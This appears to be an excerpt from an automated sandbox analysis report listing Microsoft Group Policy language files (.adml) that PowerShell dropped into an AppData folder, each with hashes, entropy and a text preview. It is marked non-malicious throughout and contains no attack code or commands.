Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Filesystem">Filesystem</string>.. <string id="NTFS">NTFS</string>.. <string id="SymlinkEvalExplain">Symbolic links can introduce vulnerabilities in certain applications. To mitigate this issue, you can selectively enable or disable the evaluation of these types of symbolic links:....Local Link to a Local Target..Local Link to a Remote Target..Remote Link to Remote Target..Remote Link to Local Target....For further information please refer to the Windows Help section....NOTE: If this policy is Disabled or

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FolderRedirection.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
Category:	dropped
Size (bytes):	7951
Entropy (8bit):	4.723629934992763
Encrypted:	false
SSDEEP:	96:LeD5pm0w3a/059U9dRz1zAkpsx1zAkWMOUH+fH/s3RpeWCBNTAynMydWcS5Pv0rA:EEVzAT7p67WMF+3s3RV5yMydWz5P0A
MD5:	B0E17494D027C66AD4CC97FE5D2E6108
SHA1:	D382CFCD7145A738FC23FE78BC925DB11E9C5A42
SHA-256:	0144A87B8D59221D8C76B55A64743F6AD72FEC812242669C05421D4D07321383
SHA-512:	65256FCD792B464E49B8A04D00442F5B4FC358337E3F6B3DDA4F3B14BA7C460A9825F1D7FF22A2C39FC1A12C188C724C0C82D3FB1A602D193D5F693D8D4335BA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Fdeploy_Cat">Folder Redirection</string>.. <string id="LocalizeXPRelativePaths">Use localized subfolder names when redirecting Start Menu and My Documents</string>.. <string id="LocalizeXPRelativePaths_Help">This policy setting allows the administrator to define whether Folder Redirection should use localized names for the All Programs, Startup, My Music, My Pictures, and My Videos subfolders when redirecting the parent Start Menu and legacy My Documents folder respectively.....If you enable this policy s

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\FramePanes.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2163
Entropy (8bit):	4.8446705224824
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yEThu85fKbISIiSPks6/jvY/wAibISvVviR0OlnIcBV:cgeD5x8gm8fK+oKWkx7v7SmVviBV
MD5:	15395250ABFE245E09EDEA1B6537814E
SHA1:	BCD13824A7D7E4DDDF9F7F60EEC6149D6F10F1D4
SHA-256:	CADF1A1ED7AF5758824AC8A710730356758359E4CF0B61B989B76A3BA9DADFF0
SHA-512:	6C4337CD68D38FC32E6AA4BEAB133AEC2E7F4DA435092F7359CAF6859E24B3FC2C6D1D9F19886DEE9F726CF1F3BD993F4FF9F1A9F626024EC593486E75B81216
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ExplorerFramePanePolicies">Explorer Frame Pane</string>.. <string id="PreviewPane">Turn on or off details pane</string>.. <string id="PreviewPane_DropDownList_Show">Always show</string>.. <string id="PreviewPane_DropDownList_Hide">Always hide</string>.. <string id="PreviewPane_help">This policy setting shows or hides the Details Pane in File Explorer.....If you enable this policy setting and configure it to hide the pane, the Details Pane in File Explorer is hidden and cannot be turned on by the

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GameExplorer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1897
Entropy (8bit):	4.8809825480443285
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKl5wrZqMZDrABpO+ODR5/aAo19ArdFV:LeD5pmLGZqi4kRhaAo10dFV
MD5:	85EE206DDBF793929AC0467A02312D46
SHA1:	27550C4F8815DF919184B033AD36AD864CD5FA84
SHA-256:	9F9F0778ABA650963783D793C7253CA72B4A7CEF436A4E34D4B5AEA6DD65BB95
SHA-512:	B76B6D2E2F3B8B4B42CFD8B609EAAAEAC8B974C11D77CA00B5A32980C43EA9F415543D4C081F4E820D58D601A76EA098F01491820CEFD40E2766488923EAF889
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DownloadGameInfo">Turn off downloading of game information</string>.. <string id="DownloadGameInfo_Help">Manages download of game box art and ratings from the Windows Metadata Services.....If you enable this setting, game information including box art and ratings will not be downloaded. ....If you disable or do not configure this setting, game information will be downloaded from Windows Metadata Services.</string>.. <string id="GAMEUX">Game Explorer</string>.. <string id="ListRecentlyPlayed">Turn off

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Globalization.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (486), with CRLF line terminators
Category:	dropped
Size (bytes):	25531
Entropy (8bit):	4.651678772761436
Encrypted:	false
SSDEEP:	384:3G+fZ/NAlGQpr1EVa+3+O+kDeZCwFBAA5ykHj0Yz0hSxqGq0:W6NAlGQpr2oSDy5PGwPH
MD5:	76A8A380A63A9348769B4A94D9EEF57F
SHA1:	B20DFDC04FB839A890E83A590020CCF263EB338E
SHA-256:	7FCB7F49FCEA58D4CFD70A65394DD7E7FD5404D7E51225FBB212035CEA78DF79
SHA-512:	D9F454A57DEE30397CA8233DBD9EBD3E136FBE53B99D34572A04960B6C2785F3B1FECC914B580FA1C033A8952C4C072FF264FAFD1345EB76083B21E3C1482A61
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomLocalesNoSelect">Disallow selection of Custom Locales</string>.. <string id="CustomLocalesNoSelect_Help">This policy setting prevents a user from selecting a supplemental custom locale as their user locale. The user is restricted to the set of locales that are installed with the operating system.....This does not affect the selection of replacement locales. To prevent the selection of replacement locales, adjust the permissions of the %windir%\Globalization directory to prevent the installation of locale

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GroupPolicy-Server.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (301), with CRLF line terminators
Category:	dropped
Size (bytes):	1487
Entropy (8bit):	4.93565859545614
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yczWOV1zWI6+xZAlxP84b6M119Z3icCV:cgeD5x8gm8fKmfg7I1/ZS9V
MD5:	721DE72286ED158412B12054999D879D
SHA1:	3E9668AD9CE409FC80B008D56BA0C213CEDD2B4B
SHA-256:	A87BB0424E1D7DEF0F6D544530A32ABB9ED6D448969FEB8C5985F30E0FD71B65
SHA-512:	A35D98E011DB3E0050FE3695F49576E2229F627D8A967907CB28B85A86762FD969D63CB89E4FE692CDA4B4F4211502F37B53C5C97FADC6A205E8174A63A9E285
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProcessTSUserLogonAsync">Allow asynchronous user Group Policy processing when logging on through Remote Desktop Services..</string>.. <string id="ProcessTSUserLogonAsync_Help">This policy setting allows Microsoft Windows to process user Group Policy settings asynchronously when logging on through Remote Desktop Services. Asynchronous user Group Policy processing is the default processing mode for Windows Vista and Windows XP.....By default, Window Server processes user Group Policy settings synchronously.....I

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GroupPolicy.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (772), with CRLF line terminators
Category:	dropped
Size (bytes):	60292
Entropy (8bit):	4.712085259009764
Encrypted:	false
SSDEEP:	768:eOZhoxHoAJPf9Op1fJDBRLPz5E/tW/4HnQ:eOZ+xIGAlBRLPz5E/8gw
MD5:	3EC08BDFFA220598C2FE18E65DC57F55
SHA1:	7E91322DA98DAA4F971A0CEEE5589D0AA601A40E
SHA-256:	BF01A53E4DD9D9A982152BB2AF4F6B78DB2E6B26D0E3F80D192AC647FAFD3261
SHA-512:	ED99C8F50AD90322E3844D63A29E573B6DE5ACA73A1C9111757B8331B6325BE9D9840D3C0945F124E058BDAB07A364360B4ECFEF14CB472487ECF6DBB7A7B606
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ResetDfsClientInfoDuringRefreshPolicy">Enable AD/DFS domain controller synchronization during policy refresh</string>.. <string id="ResetDfsClientInfoDuringRefreshPolicy_Help">Enabling this setting will cause the Group Policy Client to connect to the same domain controller for DFS shares as is being used for Active Directory.....</string>.. <string id="DisableAOACProcessing">Turn off Group Policy Client Service AOAC optimization</string>.. <string id="DisableAOACProcessing_Help">This policy setting p

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GroupPolicyPreferences.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (500), with CRLF line terminators
Category:	dropped
Size (bytes):	133320
Entropy (8bit):	4.822585844934633
Encrypted:	false
SSDEEP:	3072:TaSaHapabacaEa8aqapalasa4aMayauauaSa+awaOaW:Y
MD5:	D1A5CF9F95B52D0C47DE6C6BBA860D0A
SHA1:	112212D522046D296E4298AD5EEED40429FDAF28
SHA-256:	D79EED1FFB6836C73A921B8BD79195F3787C17CB15CEB9E27D682F27DAEA3AEF
SHA-512:	E79B6906D42A8F62A0D5B942C93C4A0A474DC6D841D7784D3EB49BDE7CA7B02F07E53D1DD2A0EE7D13974F9A9722F1A77A40C9F9A28F1DDF0955E46756F39034
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Group Policy Preference Policies</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="MMC_PrefApplications">Permit use of Application snap-ins</string>.. <string id="MMC_PrefApplications_Explain">This policy setting allows you to permit or prohibit use of Application snap-ins (Application preference item types). When prohibited, no Application preference item types appear when you attempt to create a new Application preference item, and you are unable to do so. This policy setting does not affect existing Application preference items.....If you enable or do not configure this policy setting, you permit use

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Help.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (399), with CRLF line terminators
Category:	dropped
Size (bytes):	5647
Entropy (8bit):	4.726995944697996
Encrypted:	false
SSDEEP:	96:LeD5pmkwXl3Bnrvb+st3rnZay5gok2TyV+EJlNifb/j4mRMFW78v/xvJ9xvJ7V:EG+stjZ3gyIzNiz9MFWAn9np
MD5:	3B1AD1ECF110F12067554FA487C740FD
SHA1:	0EE520F7EC886C23F0A431AA690C851B5EB0C5A2
SHA-256:	8DDB25B03AEAC60067CA82F72EDE2B7EBCEB1E48E196BAD69995C052FD2D2E86
SHA-512:	F16103456D09B6385240E7A30FBC9909F0383D1611B08E9E3EB8407BA97E5F462DF7E127E5B8F04842F4A7F54E71D13C30675906624E41CF012AAA6EE06D8731
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HelpQualifiedRootDir_Comp">Restrict potentially unsafe HTML Help functions to specified folders</string>.. <string id="HelpQualifiedRootDir_Help">This policy setting allows you to restrict certain HTML Help commands to function only in HTML Help (.chm) files within specified folders and their subfolders. Alternatively, you can disable these commands on the entire system. It is strongly recommended that only folders requiring administrative privileges be added to this policy setting..... If you enable th

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\HelpAndSupport.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3089
Entropy (8bit):	4.757831684112995
Encrypted:	false
SSDEEP:	48:cgeD5J8gmk3TikjDKO5a+A7nQK2N7nCgQ1XlD0J4qXCdCEJaN5Z7aexmFV:LeD5hm4TiADLcXnQvnzUt0JBznFmFV
MD5:	FF9EF4C6BCE28ED5D6C68034CF5FB683
SHA1:	9CD42425C65E031C5D535FD63B8A113FCE81923E
SHA-256:	C121B0C89956299E7EA7212D382E199BDF50F51FE94634740934C56BAC669CAC
SHA-512:	A86DB211B742DA417D886D1C77B22E82B4B25F84C961B7C4ADA3CB64216A35A21DDCD211B50251467E11EA234356516A1245768D5F266DC1F8F346EBC56F2B84
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Online Assistance</displayName>.. <description>Online Assistance</description>.. <resources>.. <stringTable>.. <string id="Assistance">Online Assistance</string>.. <string id="windowscomponents">Windows Components</string>.. <string id="ActiveHelpPolicy_Explain">This policy setting specifies whether active content links in trusted assistance content are rendered. By default, the Help viewer renders trusted assistance content with active elements such as ShellExecute links and Guided Help links.....If you enable this policy setting, active content links are not rendered. The text is displayed, but there are no clickable links for these elements.....If you disable or do not configu

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ICM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
Category:	dropped
Size (bytes):	19360
Entropy (8bit):	4.641124398915221
Encrypted:	false
SSDEEP:	384:m7xEdYC8St0ugzNQmh2z31TCIXBtbL+jc98MK1X:zLtk27p1MMK1X
MD5:	17CAE97BBE2A02C66C6FBDD54652B33E
SHA1:	2CCB62039419D7D7D93EA8B04D7A3E587D80DC06
SHA-256:	CAB1DD5C4B264CD58F17F3CD2C16775A7ABF379558F7506DD55FC363CA90C656
SHA-512:	3ACB5C95A38AEB54C4FF0DD0735B6C0FEF4536EA22764455D16A90A0CC8A36655AD5E8E1D964429765818E06A15A90AE7AB4AA3EE556746235FA62C074C0B3C6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CertMgr_DisableAutoRootUpdates">Turn off Automatic Root Certificates Update</string>.. <string id="CertMgr_DisableAutoRootUpdates_Help">This policy setting specifies whether to automatically update root certificates using the Windows Update website. ....Typically, a certificate is used when you use a secure website or when you send and receive secure email. Anyone can issue certificates, but to have transactions that are as secure as possible, certificates must be issued by a trusted certificate authority (CA)

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\IIS.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (743), with CRLF line terminators
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	4.880333709783744
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61y+kZDqGIZ0DafLMezn6FI2gFV:cgeD5x8gm8fKIZDqGTaYeeFcFV
MD5:	426B83EC085AE7511EF7836624778786
SHA1:	510FB2D8410021336EC73B9757A5E1A85FFA902B
SHA-256:	73B3CBE01F0416F6DE28395E5B9AC286C8149D0F46BAB6AE86B6AC4E58B0F803
SHA-512:	DECBFE7A847491E79F7CAD8AF64CDB650F82424CE657D44D8A8E9CF1BDFA413959DFD79349A88E8050EB6EB0715B4792AA2843E613A914C753A9211A07D2BF18
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="IIS">Internet Information Services</string>.. <string id="PreventIISInstall">Prevent IIS installation</string>.. <string id="PreventIISInstall_Help">"This policy setting prevents installation of Internet Information Services (IIS) on this computer. If you enable this policy setting, Internet Information Services (IIS) cannot be installed, and you will not be able to install Windows components or applications that require IIS. Users installing Windows components or applications that require IIS might not r

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\InetRes.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (592), with CRLF line terminators
Category:	dropped
Size (bytes):	457561
Entropy (8bit):	4.747379761820279
Encrypted:	false
SSDEEP:	3072:4ShXU4YfsUgEI5zZxU6AECqP68pxJXljJX2G439MYe1t8ob:ZMk43i1t8u
MD5:	10590CE50B19C233DDB6EEC95850C5F4
SHA1:	0E8CD5C92654B4655E317521164FE17548AC9284
SHA-256:	9775D601260260CA0BDB805FD89AA5C3C126B8706458404A2405711DFD708647
SHA-512:	9DEC09DF0555B8106AE2D1FE2C6405672A995687EB03B8382D0A23EF36FD273980FC15D4194142107FAFC59A148039BE7DF0FB22A4F9FC1153C06BE04AE4D18A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="11.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="InternetCPL_Advanced_Accessibility">Accessibility</string>.. <string id="InternetCPL_Advanced_International">International</string>.. <string id="InternetCPL_Advanced_Security">Security</string>.. <string id="InternetCPL_Connections">Connections Page</string>.. <string id="InternetCPL_Content">Content Page</string>.. <string id="InternetCPL_Content_Certificates">Certificates</string>.. <string id="InternetCPL_General_Appearance">Appearance</string>.. <string id="InternetCPL_Gener

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\InkWatson.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (309), with CRLF line terminators
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	4.787912997643585
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61y8p/L1u10pKiuruwuNez27BshruwlOALVIVriFV:cgeD5x8gm8fKb2gzp7Be7OA5OOFV
MD5:	386AFC1D42FDA5DA7B89C46B35C02635
SHA1:	44DC5FF2A570253D5AE1C755604DFFE11EF58022
SHA-256:	3930ADC5CC37AC32F2C02C1C3F288CAD45F18DDB232D5226B78E9CF7632014C2
SHA-512:	32AFFF54025D2A4C313228C41DFF6C2858877F5B0341F1950C822021DD2D13F1C6B70A43761EECB204AAB83762FC48BC6548B4D40A3746B5AC11C8240C973786
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PreventHandwritingErrorReports">Turn off handwriting recognition error reporting</string>.. <string id="PreventHandwritingErrorReports_Explain">Turns off the handwriting recognition error reporting tool.....The handwriting recognition error reporting tool enables users to report errors encountered in Tablet PC Input Panel. The tool generates error reports and transmits them to Microsoft over a secure connection. Microsoft uses these error reports to improve handwriting recognition in future versions of Windows

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\KDC.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (554), with CRLF line terminators
Category:	dropped
Size (bytes):	10440
Entropy (8bit):	4.663520278145665
Encrypted:	false
SSDEEP:	96:LeD5pmaMIjP+dQzot5fZeuGnu9rAEQNsVS3sYgovZ4v/4euVuY9+UDVxgACCmskc:Ep8QzgfZeu1905teYUANOKIk
MD5:	7783B0D4B182BE9230A649D6E8DC56AD
SHA1:	215263A87F861BD2D8263BAD8011C5DDA0357BEB
SHA-256:	DB2F6E21FDB453CD8E67C278038547D12EB5C58C1D0280776670D618AEDED64F
SHA-512:	1B13DB33C12191ECF4687C6DEAF76E4776A10AAB045150C2A85369B0AA5553ECF42524A585A2A33905D1B124C1108FF2CACCDFE9C86D8CBBA89FD37E37F8D996
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>KDC Settings</displayName>.. <description>Configuration settings for the Kerberos Key Distribution Center.</description>.. <resources>.. <stringTable>.. <string id="KDC">KDC</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Key Distribution Center (KDC) searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the KDC will search the forests in this list if it is unable to resolve a two-part SPN in the local forest. The forest search is performed by using a glo

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Kerberos.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (840), with CRLF line terminators
Category:	dropped
Size (bytes):	19138
Entropy (8bit):	4.73754316262114
Encrypted:	false
SSDEEP:	384:7atR7siAzz45FWuozQV/hI+DklrjMvJK1ORt:ebksWnzkhI19OL
MD5:	AA29F707B1FE528F5F856EC64E771DAC
SHA1:	6F3F897807668918B8A6F7C4E78B17AA445070F9
SHA-256:	4148DF3125629ABE00141FACEF7519BBDE4D3877067A234F35C0A63B740810F6
SHA-512:	4281194C43BF70E7839FF63107549994D8C89D211317E30557B366C32E30F58505F91AD17E8073869579C6EADA056D8973CD25A489D929FAF796CAE42F5A874E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Kerberos Settings</displayName>.. <description>Configuration settings for the Kerberos authentication protocol.</description>.. <resources>.. <stringTable>.. <string id="kerberos">Kerberos</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Kerberos client searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the Kerberos client searches the forests in this list, if it is unable to resolve a two-part SPN. If a match is found, the Kerberos client requests a re

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LanmanServer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
Category:	dropped
Size (bytes):	6322
Entropy (8bit):	4.728370721511469
Encrypted:	false
SSDEEP:	96:LeD5pm8qDY/ixB4w28Divg6JR+CfREEM2eYJk2y3XTE68TpwQEOgRVLTMV:E9iUw2c0rUEk2yTEZpBmLg
MD5:	33F09CDADA6D62BAE3F0DC0A3E1A2C2A
SHA1:	62BEEE0D918637A68746741C74244FCF39D1A3FB
SHA-256:	3393D80184E3C251A2E8249C13BBBE99A9045AD37550D8497D960371964BF8B7
SHA-512:	DE12FA4C934B9A56C86FF7405D3DEBE1D8F3B4AB3ACDD419888FF2399FEDCABC42CFAF26EDA458C0B874D052327B1DC7BE8C454AA4DE0CF7C920F590C40C5BF0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_LanmanServer">Lanman Server</string>.. <string id="Lbl_FollowShare">Allow hash publication only for shared folders on which BranchCache is enabled</string>.. <string id="Lbl_DisableOnAllShares">Disallow hash publication on all shared folders</string>.. <string id="Lbl_EnableOnAllShares">Allow hash publication for all shared folders</string>.. <string id="Pol_HashPublication">Hash Publication for BranchCache</string>.. <string id="Pol_HashPublication_Help">This policy setting specifies w

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LeakDiagnostic.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	4.91680451974178
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKbXSr4eKUsXZ3W5/1n0BsIvFV:LeD5pmnCr4QCW1hCsIvFV
MD5:	FAB2C03A061CF266E4BF99D9AD8410CC
SHA1:	62C30ED88810E558C2C5B29DF833E0B84979F798
SHA-256:	1FAD47D1BCFC5110370B1E428F800DD67B65037C2C029C39355D1F0AF51B4712
SHA-512:	2B49196BE14CD1493F98BB4294D50CE42481D67A02357FD6F26067588B4D19B96D7D6677E5A3B6DA5A99329B7422BD5C257C591CBD6C773E5A106EE47E6A2909
Malicious:	false
